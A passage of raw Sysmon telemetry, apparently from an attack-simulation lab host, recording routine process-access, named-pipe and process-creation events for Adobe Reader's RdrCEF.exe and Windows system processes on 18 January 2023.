DC\Reader\acrocef_1\RdrCEF.exe{FE4C2B44-E652-63C7-8A06-00000000AF02}6652C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d342d7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+f30f9b(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+f3135d(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4734(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4223(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9a5cd(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9b4f4(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c991da(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99794(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99674(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+40cbbf(wow64) 10341000x800000000000000047013Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.150{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E653-63C7-8F06-00000000AF02}6444C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000047012Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.147{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E653-63C7-8F06-00000000AF02}6444C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000047011Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.147{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-E653-63C7-8F06-00000000AF02}6444C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\KERNEL32.DLL+1d39f|c:\windows\system32\rpcss.dll+25579|c:\windows\system32\rpcss.dll+3fd82|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000047010Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:11.088{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.1909495649199044735C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000047009Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:11.088{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.1909495649199044735C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 18141800x800000000000000047008Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:11.088{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.4130472065104120613C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000047007Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:11.088{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.4130472065104120613C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000047006Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.086{FE4C2B44-E650-63C7-8906-00000000AF02}37966944C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe{FE4C2B44-E653-63C7-8E06-00000000AF02}7120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d342d7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+11f6df2(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efed18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efeba0(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4734(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4223(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9a5cd(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9b4f4(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c991da(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99794(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99674(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+40cbbf(wow64) 10341000x800000000000000047005Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.086{FE4C2B44-E650-63C7-8906-00000000AF02}37966944C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe{FE4C2B44-E653-63C7-8E06-00000000AF02}7120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d342d7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+11f6df2(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efed18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efeba0(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4734(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4223(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9a5cd(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9b4f4(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c991da(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99794(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99674(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+40cbbf(wow64) 10341000x800000000000000047004Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.086{FE4C2B44-E650-63C7-8906-00000000AF02}37966944C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe{FE4C2B44-E653-63C7-8E06-00000000AF02}7120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d342d7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+11f6df2(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efed18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efeba0(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4734(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4223(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9a5cd(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9b4f4(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c991da(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99794(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99674(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+40cbbf(wow64) 10341000x800000000000000047003Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.079{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E653-63C7-8E06-00000000AF02}7120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047002Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.079{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E653-63C7-8E06-00000000AF02}7120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000047001Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:11.012{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.2388316626404200114C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000047000Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:11.012{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.2388316626404200114C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000046999Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.010{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046998Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.010{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046997Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.010{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046996Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.009{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046995Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.009{FE4C2B44-DDF4-63C7-A004-00000000AF02}47002992C:\Windows\system32\csrss.exe{FE4C2B44-E653-63C7-8E06-00000000AF02}7120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000046994Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.008{FE4C2B44-E650-63C7-8906-00000000AF02}37963120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe{FE4C2B44-E653-63C7-8E06-00000000AF02}7120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9888(wow64)|C:\Windows\System32\KERNELBASE.dll+157bad(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe+1136f|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe+2465|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+32aa1bc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+f3c9d6(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+17a4c0e(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+13618b7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d01d85(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c56e7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c53b6(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c50f1(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+5794b9d(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+57948e5(wow64) 154100x800000000000000046993Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.008{FE4C2B44-E653-63C7-8E06-00000000AF02}7120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe22.3.20310.0Adobe RdrCEFAdobe AcroCEFAdobe Systems IncorporatedAcroCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/22.3.20310 Chrome/105.0.0.0" --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\debug.log" --touch-events=enabled --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --launch-time-ticks=3170428493 --mojo-platform-channel-handle=2396 --field-trial-handle=1448,i,5134491287969886603,3611864682310924974,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1C:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=387770AB000A15CC3D30E0594F2AFC02,SHA256=AD06655370603DD0F76F2E7824F749DA4B753EF57ECAE93B9A24B5EB7F5EC27A,IMPHASH=6B10CB5D44CC40175E3AB76C7CC1D2A0{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe" --backgroundcolor=16514043 10341000x800000000000000046992Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.008{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E653-63C7-8E06-00000000AF02}7120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046991Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.007{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000046990Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:11.003{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.5768.8298695663077704763C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000046989Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:11.003{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.5768.8298695663077704763C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000047170Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:12.899{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program 